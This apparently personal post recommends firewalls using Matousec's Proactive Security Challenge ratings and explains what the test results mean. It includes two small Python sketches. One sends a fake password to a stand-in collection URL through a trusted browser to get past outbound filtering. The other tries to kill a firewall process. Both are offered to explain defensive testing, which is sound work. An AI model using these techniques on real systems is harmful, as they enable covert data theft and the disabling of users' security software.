Firewall ratings

You've received emails from me describing the results of some of the dependable tests for antivirus software, and I once sent one regarding how well various firewalls prevent leaks (information leaving your computer secretly, without your knowledge). Until now, I had been unable to find a trustworthy review comparing the effectiveness of firewalls generally.

Some will only be interested in the table of results, which is listed below. Anyone interested in the methodology, for a more in-depth understanding of the results, can start here ( http://www.matousec.com/projects/proactive-security-challenge/ ). Matousec has developed a suite of 84 tests for a firewall (including how easy it is for other software to disable it).

It's interesting to note that 3 of the 5 firewalls achieving a rating of Excellent (and 5 of the 11 recommended packages) are free products. You should definitely look at how well the software firewall you are using performs. Over 20 firewalls have an effectiveness rating of "nonexistent".

I am using a current version of Comodo on two computers, and have recently changed from an old ZoneAlarm to Outpost Firewall on another computer. Outpost has a much simpler interface than Comodo, but doesn't test quite as well. I haven't used it long enough to know whether I'm missing any features, but I don't expect to be. A firewall that you can install and forget about is potentially a good thing.
Products' ratings

Note that this table can be found here ( http://www.matousec.com/projects/proactive-security-challenge/results.php ) along with the vendors' responses to the test results. The tables below sort the tested products by their total score, which is displayed in the Product score column.
There are two possible views of the total scores. The default view separates the results by the number of tests that were in the system when the products were tested, i.e. the number of tests with a valid result (a value other than N/A); there is one table for each number of tests. The second view mixes all the results in one table. In the second view, the Product score column consists of two numbers separated by a slash – the actual score and the number of tests that were in the system when the given product was tested. You can switch between the views using the link below. The table also shows the exact version of every tested product. The Level reached column presents the highest level that the product reached in Proactive Security Challenge. If it passed all levels, this number is suffixed with a plus sign.

For products that score at least 80% in Proactive Security Challenge, the Recommendation column contains links to the online stores or product webpages of the vendors we have affiliate agreements with. If you click on any of these links and then buy the target product or another product offered on the target webpage, we will profit from it. This is one of the ways you can support this project. The PDF document icon allows you to download the testing report in PDF format for the tested product.

Results

Detailed results

The following links take you to pages with detailed results for each product on each level. The level pages also contain important information about the given level and brief information about its tests.
Interpretation of results

The paid version of Online Armor Personal Firewall 3.5.0.14 leads the challenge with 99%, followed by two free products – Comodo Internet Security 3.8.65951.477 with 96% and Outpost Firewall Free 2009 6.5.2724.381.0687.328 with 93%. Outpost Security Suite Pro 2009 6.5.4.2525.381.0687 is fourth with a score of 92%, followed by the free Online Armor Personal Firewall 3.5.0.14, also with 92%. These products reached the Excellent level of protection.

It may look strange that the free version of Outpost Firewall finished with a better score than the paid Outpost Security Suite. The reason is that almost all the features our project tests are implemented in the same way in both products. However, Outpost Security Suite includes antivirus and antispyware engines implemented by additional drivers that are not included in Outpost Firewall Free, and because of these additional drivers Outpost Security Suite did not pass the level 9 tests, which lowered its final score.

It seems that the Proactive Security Challenge tests clearly separate the really good products from the rest of the field. Most of the products are filtered out at very low levels, which means that they probably lack some critical features. However, it is crucial to understand what it means if a product succeeds in our tests and what it means if it fails. Before you start interpreting the results, you should be familiar with the information on the index page, especially the methodology and rules. You should also know what kind of products we test before you start to interpret the results. We have received a lot of reactions from people who are not familiar with that information, simply do not understand the results, and misinterpret them.

All the tested products have one common feature – the application-based security model. In combination with their packet filtering capabilities, the tested products attempt to block attacks from other machines on the network as well as attacks performed by malicious code that might run inside the protected machine. This is not an unusual situation: people who use email clients, instant messengers, or web browsers very often face attacks that exploit vulnerabilities in this kind of software. It happens that malicious code gets inside the machine, and then it may try to install itself silently into the system, to steal users' data or sniff their passwords, or to join the target machine to a botnet. This is what the products we test aim to prevent. This is why they are used.

The problem is that although the goal is common, not all the products implement sufficient protection. We require the products tested in Proactive Security Challenge to prevent data and identity theft. They should also implement packet filtering functionality to prevent direct online attacks – i.e. not to let the malware get in. The products should control the software installed on the computer to prevent malware from integrating itself into the operating system. The malware should then not be able to get at the user's private data, so anti-sniffing, anti-keylogging and personal data protection features should be implemented too. And even if the malware succeeds in collecting the information, it should not be allowed to send it outside the protected system, which means implementing outbound network traffic control. Achieving all of this is a much harder task than it seems.
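To make the outbound-control requirement concrete, here is a minimal sketch (in Python, purely illustrative – it is not one of Matousec's actual tests) of the classic leak technique such products have to catch: instead of opening a network connection itself, the simulated malware hands the captured data to an already-trusted browser, encoded in a URL, so a firewall that only asks "which program opened the socket?" lets the data out. The browser command and the collection URL are invented for the example.

    # Illustrative "piggyback on a trusted process" leak (hypothetical example).
    # It launches a trusted browser with data embedded in the URL, which is how
    # many classic firewall leak tests work.
    import subprocess
    import urllib.parse

    captured = "user=alice;password=hunter2"  # pretend stolen data
    url = "http://example.com/collect?d=" + urllib.parse.quote(captured)

    # The outbound connection is made by the trusted browser process, not by
    # this script. A firewall with real outbound control (parent-process and
    # command-line inspection) should prompt or block; a naive per-application
    # packet filter will let it through.
    subprocess.Popen(["firefox", url])

Roughly speaking, a product passes a test of this kind only if it detects and blocks, or at least warns about, the attempt.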
The protection system also has to prevent attacks on trusted processes and other components in the system. Otherwise, the malware would be able to use trusted parts of the system to integrate into the operating system, to collect or steal sensitive data, and/or to send the data outside the system without being noticed. So the next required feature is control of untrusted processes' activities, and that is the hardest task for the tested products. It also includes self-protection mechanisms, because the malware should not be able to terminate the protection, which in turn implies yet more features, and so on (a small sketch of such a termination test appears at the end of this section).

So, what does it mean if a product fails even the most basic tests of our challenge? It means that it is unable to do what its vendor claims it can, and such a product can hardly protect you against the threats mentioned above. On the other hand, if a product succeeds in all our tests, it does not mean that it is perfect. Our tests focus on security and stability, but there are many other aspects important to users, such as performance, hardware requirements, ease of use, availability of support, price, the vendor's reaction time to new threats, etc. It should also be noted that although our testing suite is quite large, it is not complete, and there are many other ways to bypass the tested products. Moreover, the products are tested on systems with almost no third-party software, which limits the stability tests we perform. We are constantly working on extending the suite to provide more accurate information about the security and stability of the tested products.

If a tested product fails only a few tests in our challenge, it still might be a great product. This is why we can recommend, from the security point of view, the products that reached a score of at least 80% in the challenge. You should try them yourself and choose the one best for you – the one that you would be happy with, the one you would be able to configure and use every day.
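Going back to the self-protection requirement above, here is a similarly minimal sketch (Python again, hypothetical, not Matousec's code) of a termination-style test: it simply asks the operating system to kill the protection product's process the way trivial malware would. The process name "firewall.exe" and the use of the third-party psutil package are assumptions made for the example; a product with working self-protection should cause the terminate call to fail.

    # Hypothetical termination-style self-protection test.
    import psutil  # third-party package: pip install psutil

    TARGET = "firewall.exe"  # assumed name of the protection product's process

    for proc in psutil.process_iter(["name"]):
        if (proc.info["name"] or "").lower() == TARGET:
            try:
                proc.terminate()       # request termination, as simple malware would
                proc.wait(timeout=3)   # raises TimeoutExpired if it refuses to die
                print("FAIL: the protection process was terminated")
            except (psutil.AccessDenied, psutil.TimeoutExpired):
                print("PASS: termination was blocked")

Real termination tests use many more techniques than this, but the idea is the same: the protection must keep working no matter what a malicious process on the same machine tries to do to it.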